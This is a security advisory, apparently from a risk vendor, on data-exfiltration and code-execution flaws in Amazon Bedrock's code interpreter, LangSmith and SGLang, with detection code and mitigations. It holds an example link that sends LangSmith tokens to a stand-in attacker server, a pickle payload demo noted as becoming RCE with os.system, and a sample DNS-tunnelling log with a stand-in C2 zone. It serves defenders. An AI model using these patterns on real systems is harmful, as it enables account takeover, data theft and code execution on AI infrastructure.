

Critical AI Vulnerabilities in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and Remote Code Execution


Executive Summary

Recent research has disclosed critical vulnerabilities in three widely used AI platforms: Amazon Bedrock (the AgentCore Code Interpreter), LangSmith, and SGLang. The flaws enable data exfiltration and remote code execution (RCE), affect both cloud-managed and self-hosted deployments, and in two of the three cases (Bedrock and SGLang) remain unpatched as of this report. Attackers can use them to bypass sandbox network isolation, hijack user accounts, and execute arbitrary code on backend inference servers. The impact is amplified by the sensitive data and privileged credentials that AI workloads typically hold. This advisory provides a technical breakdown, exploitation status, affected versions, and mitigation steps to help organizations defend against these threats.

Technical Information

The vulnerabilities span multiple attack surfaces and exploit distinct weaknesses in each platform’s architecture and security controls.

In Amazon Bedrock, the AgentCore Code Interpreter (introduced in August 2025) permits outbound DNS queries even when configured in "sandbox mode" with "no network access". The interpreter exists to run model- or user-supplied code, so an attacker who can get code into it needs only an egress channel, and DNS provides one: commands and data are encoded in query names and responses, giving a covert command-and-control (C2) channel through the sandbox's resolver. Over this channel an adversary can exfiltrate anything the sandbox can reach, such as S3 bucket contents fetched with the interpreter's credentials, and receive further instructions to execute. The blast radius is set by the IAM role attached to the interpreter: an overprivileged role turns a leak through the network boundary into access to a wide range of AWS resources. Notably, Amazon has classified this behavior as "intended functionality", leaving customers responsible for compensating controls.

LangSmith was found vulnerable to account takeover via URL parameter injection (CVE-2026-25750, CVSS 8.5). The flaw stems from insufficient validation of the baseUrl query parameter in the LangSmith Studio interface: Studio treats the supplied value as the backend it should talk to and sends authenticated requests there. An attacker crafts a link such as smith.langchain.com/studio/?baseUrl=https://attacker-server.com and lures a logged-in user into opening it; the user's browser then transmits the bearer token, user ID, and workspace ID to the attacker's server. With that token the attacker gains unauthorized access to AI trace histories and the material they contain, including internal SQL queries, CRM records, and proprietary code. No further exploit is needed beyond the link itself; the delivery vector is social engineering, typically a phishing message.
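The bug class behind CVE-2026-25750 is a backend URL read from the query string and trusted as the place to send credentials. The following is an added example written for this advisory, not LangSmith's code: a flawed selector beside an allowlisting one. The default API origin, the allowlisted hosts and the local dev-server entries are assumptions made for the demo.

```python
"""Added example (not LangSmith's code): allowlisting a backend URL taken from the
query string, the bug class behind CVE-2026-25750. Hostnames, the default API
origin and the dev-server entries are assumptions made for this demo."""
from urllib.parse import parse_qs, urlsplit

DEFAULT_API = "https://api.smith.langchain.com"   # assumed production backend

# Assumed allowlist: (scheme, host, port) triples the UI may send a token to.
ALLOWED_API_ORIGINS = {
    ("https", "api.smith.langchain.com", 443),
    ("http", "localhost", 8000),      # hypothetical local dev server
    ("http", "127.0.0.1", 8000),
}

DEFAULT_PORTS = {"https": 443, "http": 80}


def vulnerable_pick_base_url(query_string, default=DEFAULT_API):
    """The flawed pattern: whatever ?baseUrl= says becomes the API the app
    authenticates to, so a single link can redirect the bearer token anywhere."""
    params = parse_qs(query_string)
    return params.get("baseUrl", [default])[0]


def safe_pick_base_url(query_string, default=DEFAULT_API):
    """Accept ?baseUrl= only if its origin is on the allowlist; otherwise fall
    back to the default. Returns a normalised origin, never the raw input."""
    params = parse_qs(query_string)
    candidate = params.get("baseUrl", [None])[0]
    if candidate is None:
        return default
    parts = urlsplit(candidate.strip())
    # Embedded credentials are how "https://attacker.com\@api.example" style
    # confusions work: browsers and parsers disagree on where the host starts.
    if parts.username is not None or parts.password is not None:
        return default
    try:
        host = parts.hostname                     # lower-cased by urlsplit
        port = parts.port or DEFAULT_PORTS.get(parts.scheme)
    except ValueError:                            # non-numeric or out-of-range port
        return default
    if host is None or (parts.scheme, host, port) not in ALLOWED_API_ORIGINS:
        return default
    origin = f"{parts.scheme}://{host}"
    if port != DEFAULT_PORTS.get(parts.scheme):
        origin += f":{port}"
    return origin


if __name__ == "__main__":
    evil = "baseUrl=https://attacker-server.com"
    print("vulnerable:", vulnerable_pick_base_url(evil))
    print("hardened:  ", safe_pick_base_url(evil))
```

The allowlist compares a parsed (scheme, host, port) triple rather than doing a string prefix check, which is what defeats lookalike hosts such as api.smith.langchain.com.attacker-server.com, scheme-relative //attacker-server.com, and userinfo tricks. Rejecting rather than "fixing" unexpected input keeps the fallback behaviour identical to the no-parameter case.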

SGLang suffers from three critical vulnerabilities rooted in unsafe Python pickle deserialization, leading to unauthenticated remote code execution. The CVEs are CVE-2026-3059 (the ZeroMQ broker in the multimodal generation module, CVSS 9.8), CVE-2026-3060 (the encoder-parallel disaggregation module, CVSS 9.8), and CVE-2026-3989 (the replay_request_dump.py utility, CVSS 7.8). In the first two, an attacker who can reach the exposed socket sends a crafted pickle payload that the server deserializes without authentication or validation; because pickle invokes arbitrary callables during unpickling, this yields code execution as the SGLang process and potentially full system compromise. CVE-2026-3989 affects a dump-replay utility rather than a network-listening service, which is reflected in its lower score. The network-reachable flaws are trivial to exploit, and all three remain unpatched as of this writing.
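To make the mechanism concrete, here is an added, generic illustration written for this advisory. It is not SGLang's broker code and not the published exploit: it shows why unpickling bytes from a socket is code execution, and one defensive unpickler that only resolves an explicit registry of message types. The message class and the harmless sentinel callable are constructed for the demo; a real payload would name os.system or subprocess in the same slot.

```python
"""Added example (generic illustration, not SGLang's broker code and not the
published exploit): why unpickling bytes from a socket is code execution, and
one defensive unpickler. The message class and the sentinel callable are
constructed for this demo; a real payload would name os.system instead."""
import io
import pickle

MESSAGE_MODULE = __name__   # module the legitimate message types live in


class GenerateRequest:
    """Constructed stand-in for a legitimate internal RPC message."""

    def __init__(self, prompt, max_tokens):
        self.prompt = prompt
        self.max_tokens = max_tokens


EXECUTED = []   # records that attacker-chosen code ran; harmless sentinel


def attacker_callable(marker):
    EXECUTED.append(marker)
    return marker


class Payload:
    """pickle calls whatever __reduce__ names, with the arguments given, at
    load time. Swap attacker_callable for os.system and this is the RCE."""

    def __reduce__(self):
        return (attacker_callable, ("pwned",))


def build_malicious_message():
    return pickle.dumps(Payload())


def build_benign_message():
    return pickle.dumps(GenerateRequest("hello", 16))


def vulnerable_handler(raw):
    """The flawed pattern: deserialise untrusted bytes straight off the wire."""
    return pickle.loads(raw)


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve globals only from an explicit registry of expected message
    types; never import or look up anything else the payload asks for."""
    ALLOWED = {"GenerateRequest": GenerateRequest}

    def find_class(self, module, name):
        if module == MESSAGE_MODULE and name in self.ALLOWED:
            return self.ALLOWED[name]
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def hardened_handler(raw):
    return RestrictedUnpickler(io.BytesIO(raw)).load()


def demo():
    """Run both handlers against both messages and report what happened."""
    EXECUTED.clear()
    unrestricted_result = vulnerable_handler(build_malicious_message())
    ran_in_vulnerable = list(EXECUTED)
    EXECUTED.clear()
    try:
        hardened_handler(build_malicious_message())
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    benign = hardened_handler(build_benign_message())
    return {
        "unrestricted_result": unrestricted_result,
        "ran_in_vulnerable": ran_in_vulnerable,
        "blocked_by_restricted": blocked,
        "ran_in_restricted": list(EXECUTED),
        "benign_roundtrip": (benign.prompt, benign.max_tokens),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The restricted unpickler is a containment measure, not a cure: pickle still executes a small virtual machine over attacker bytes, and allowlists have been bypassed before. The durable fix for an internal RPC path is a non-executable encoding (JSON, msgpack or protobuf) over an authenticated transport, which is what operators should expect from an eventual vendor patch.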

Each vulnerability maps to MITRE ATT&CK techniques. The Bedrock DNS channel corresponds to T1071.004 (Application Layer Protocol: DNS) for C2 and T1048.003 (Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol) for data theft. The SGLang flaws correspond to T1190 (Exploit Public-Facing Application) and T1059.006 (Command and Scripting Interpreter: Python). The LangSmith flaw corresponds to T1566.002 (Phishing: Spearphishing Link) for delivery and T1528 (Steal Application Access Token) for impact.

Indicators of compromise (IOCs) are behavioral here, since no attacker infrastructure has been published. Look for unusual outbound DNS queries from Bedrock AgentCore sandboxes (high query volume to a single zone, long or high-entropy subdomain labels, and uncommon record types such as TXT or NULL); browser requests that carry a LangSmith bearer token to any host other than the legitimate LangSmith API; unexpected inbound TCP connections to SGLang ZeroMQ broker or disaggregation ports; and anomalous child processes, outbound connections, or file creation by the SGLang Python process.
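The DNS indicators above can be turned into detection logic. What follows is an added example written for this advisory, not an AWS or BeyondTrust tool: it aggregates resolver query records per source address and zone and scores four classic tunnelling traits (nearly every query is a new subdomain, labels are long, labels are high-entropy, and the record types are ones normal clients rarely use). The input records are constructed and only loosely follow the Route 53 Resolver query-log shape; the field names, addresses and the c2-example.test zone are assumptions, and the two-label zone heuristic is a stand-in for a proper public-suffix lookup.

```python
"""Added example (illustrative detection logic written for this advisory, not an
AWS or BeyondTrust tool): flag DNS-tunnel behaviour in resolver query logs.
The records below are constructed and only loosely follow the Route 53
Resolver query-log shape; field names, addresses and zones are assumptions."""
import json
import math
from collections import defaultdict

ODD_TYPES = {"TXT", "NULL"}     # record types normal workloads rarely query

# Constructed sample: 10.0.2.45 behaves like a normal workload, 10.0.1.23 like
# an interpreter sandbox pushing data out in long hex labels via TXT queries.
SAMPLE_LOG = "\n".join([
    '{"srcaddr": "10.0.2.45", "query_name": "s3.us-east-1.amazonaws.com.", "query_type": "A"}',
    '{"srcaddr": "10.0.2.45", "query_name": "s3.us-east-1.amazonaws.com.", "query_type": "A"}',
    '{"srcaddr": "10.0.2.45", "query_name": "sts.us-east-1.amazonaws.com.", "query_type": "A"}',
    '{"srcaddr": "10.0.2.45", "query_name": "s3.us-east-1.amazonaws.com.", "query_type": "AAAA"}',
    '{"srcaddr": "10.0.2.45", "query_name": "sts.us-east-1.amazonaws.com.", "query_type": "A"}',
    '{"srcaddr": "10.0.1.23", "query_name": "7f3a9c1e5b2d8f0a4c6e1b9d3f5a7c2e8b0d4f6a1c3e5b7d.c2-example.test.", "query_type": "TXT"}',
    '{"srcaddr": "10.0.1.23", "query_name": "9e2c4a6f8b0d1c3e5a7f9b1d3c5e7a9f2b4d6c8e0a1f3b5d.c2-example.test.", "query_type": "TXT"}',
    '{"srcaddr": "10.0.1.23", "query_name": "1c5e7a9b3d2f4c6e8a0b1d3f5c7e9a2b4d6f8c0e1a3b5d7f.c2-example.test.", "query_type": "TXT"}',
    '{"srcaddr": "10.0.1.23", "query_name": "4b8d0f2a6c1e3b5d7f9a2c4e6b8d0f1a3c5e7b9d2f4a6c8e.c2-example.test.", "query_type": "TXT"}',
    '{"srcaddr": "10.0.1.23", "query_name": "6d1f3b5a7c9e2b4d6f8a0c1e3b5d7f9a2c4e6b8d0f1a3c5e.c2-example.test.", "query_type": "TXT"}',
    '{"srcaddr": "10.0.1.23", "query_name": "2a4c6e8b0d1f3a5c7e9b2d4f6a8c0e1b3d5f7a9c2e4b6d8f.c2-example.test.", "query_type": "TXT"}',
])


def shannon_entropy(s):
    """Bits per character; random hex sits near 4, English words well below 3.5."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Split a query name into (zone, subdomain). Simplification: the last two
    labels are treated as the zone; real code would consult a public-suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def analyze(log_text, min_queries=5, flag_at=3):
    """Aggregate per (source, zone) and score four tunnelling traits."""
    agg = defaultdict(lambda: {"queries": 0, "subs": set(), "chars": 0,
                               "entropy": 0.0, "odd": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        zone, sub = split_name(rec["query_name"])
        st = agg[(rec["srcaddr"], zone)]
        st["queries"] += 1
        st["subs"].add(sub)
        st["chars"] += len(sub)
        st["entropy"] += shannon_entropy(sub.replace(".", ""))
        if rec.get("query_type") in ODD_TYPES:
            st["odd"] += 1

    findings = []
    for (src, zone), st in agg.items():
        n = st["queries"]
        if n < min_queries:          # too little data to judge
            continue
        traits = {
            "unique_ratio": len(st["subs"]) / n,
            "avg_label_len": st["chars"] / n,
            "avg_entropy": st["entropy"] / n,
            "odd_type_ratio": st["odd"] / n,
        }
        score = sum([traits["unique_ratio"] > 0.8,
                     traits["avg_label_len"] > 30,
                     traits["avg_entropy"] > 3.5,
                     traits["odd_type_ratio"] > 0.5])
        if score >= flag_at:
            findings.append({"srcaddr": src, "zone": zone, "queries": n,
                             "score": score, **traits})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(json.dumps(f, sort_keys=True))
```

Route 53 Resolver query logging only records queries that pass through your VPC resolver, so this kind of analysis presupposes that the interpreter is running in VPC mode; in sandbox mode there is nothing for a customer to run it over, which is one more reason to move. Thresholds here are deliberately coarse and should be tuned against a baseline of the workload's normal DNS before alerting on them.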

Exploitation in the Wild

As of the latest public reporting, there are no confirmed incidents of these vulnerabilities being exploited in the wild. However, proof-of-concept (PoC) code and detailed technical advisories have been published for all three platforms. For Amazon Bedrock, BeyondTrust researchers demonstrated a working PoC that establishes a DNS-based C2 channel and exfiltrates data from the sandbox environment. In the case of LangSmith, Miggo Security released a PoC showing how a crafted URL can leak authentication tokens and session data. For SGLang, Orca Security and CERT/CC have published PoCs that exploit the pickle deserialization flaws to achieve RCE.

The public availability of these PoCs, combined with the high value of data processed by these AI platforms, significantly increases the risk of imminent exploitation, especially by opportunistic attackers and advanced persistent threats (APTs) seeking to compromise AI-driven infrastructure.

APT Groups using this vulnerability

No specific APT groups have been publicly attributed to the exploitation of these vulnerabilities as of this report. However, the attack surface—encompassing cloud AI infrastructure, developer platforms, and backend orchestration systems—makes these flaws attractive to a broad spectrum of threat actors. Sectors such as technology, finance, healthcare, and government, which are early adopters of AI and often process sensitive data, should consider themselves at elevated risk. The presence of public PoCs and the criticality of the vulnerabilities suggest that APT groups and cybercriminal organizations are likely to incorporate these exploits into their toolkits in the near future.

Affected Product Versions

Amazon Bedrock AgentCore Code Interpreter is affected as of March 2026. It is an AWS-managed service, so there is no customer-applied patch and no version to pin; Amazon has not changed the behavior. The exposure exists whenever an interpreter is configured in "sandbox mode" with "no network access", which is precisely the setting operators would expect to block DNS.

LangSmith is vulnerable in all versions prior to 0.12.71; the fix shipped in December 2025. Both the hosted service and self-hosted instances were affected. Self-hosted operators running older versions remain at immediate risk and must upgrade to 0.12.71 or later.

SGLang is affected in all released versions as of March 2026. The vulnerable components are the ZeroMQ broker in the multimodal generation module (CVE-2026-3059), the encoder-parallel disaggregation module (CVE-2026-3060), and the replay_request_dump.py utility (CVE-2026-3989). No official patches have been released; any deployment whose service interfaces are reachable by untrusted parties is exploitable.

Workaround and Mitigation

For Amazon Bedrock, move sensitive workloads from "sandbox mode" to "VPC mode" so that the interpreter's traffic is subject to your own VPC network controls. In VPC mode a Route 53 Resolver DNS Firewall rule group can block resolution of any domain outside an allowlist, which stops DNS tunnelling at the resolver, and Route 53 Resolver query logging gives you the records needed to detect the IOCs above. Audit the IAM execution role attached to each interpreter and reduce it to the specific buckets, prefixes and services the workload needs: an interpreter role with broad S3 or STS permissions is what turns a DNS leak into a data breach.

For LangSmith, upgrade to version 0.12.71 or later immediately. Because the exploit is a single link, pair the upgrade with user awareness training that calls out links to smith.langchain.com carrying unexpected query parameters, and monitor for Studio sessions making authenticated requests to hosts other than the legitimate API. Rotate API keys and invalidate sessions for any user who may have opened a suspicious link before the fix was applied.

For SGLang, treat every service interface as trusted-network-only: bind the ZeroMQ broker and disaggregation endpoints to loopback or a private interface, and never expose them to untrusted networks or the public internet. Do not run replay_request_dump.py on dump files from untrusted sources. Monitor the SGLang Python process for suspicious activity such as unexpected child processes, outbound connections, or file creation. Apply vendor patches as soon as they are released; until then, network segmentation and host firewall rules are the effective controls. Note that a web application firewall does not inspect ZeroMQ traffic, so it offers no protection against these flaws.

References

The following resources provide additional technical details, advisories, and PoC code:

  • BeyondTrust Research: Amazon Bedrock DNS Exfiltration
  • Miggo Security Advisory: LangSmith Account Takeover (CVE-2026-25750)
  • LangSmith Release Notes: LangSmith Studio Updates
  • Orca Security Blog: SGLang RCE Vulnerabilities (CVE-2026-3059, CVE-2026-3060, CVE-2026-3989)
  • Reddit SecOpsDaily: Community Discussion
  • Infosecurity Magazine: AWS Bedrock Flaw

Rescana is here for you

Rescana is committed to helping organizations navigate the evolving threat landscape posed by AI platform vulnerabilities. Our Third-Party Risk Management (TPRM) platform empowers security teams to continuously assess, monitor, and mitigate risks across their digital supply chain. We provide actionable intelligence, automated risk scoring, and deep visibility into vendor exposures—enabling you to make informed decisions and respond rapidly to emerging threats. For any questions or to discuss how Rescana can support your cybersecurity strategy, please contact us at ops@rescana.com.
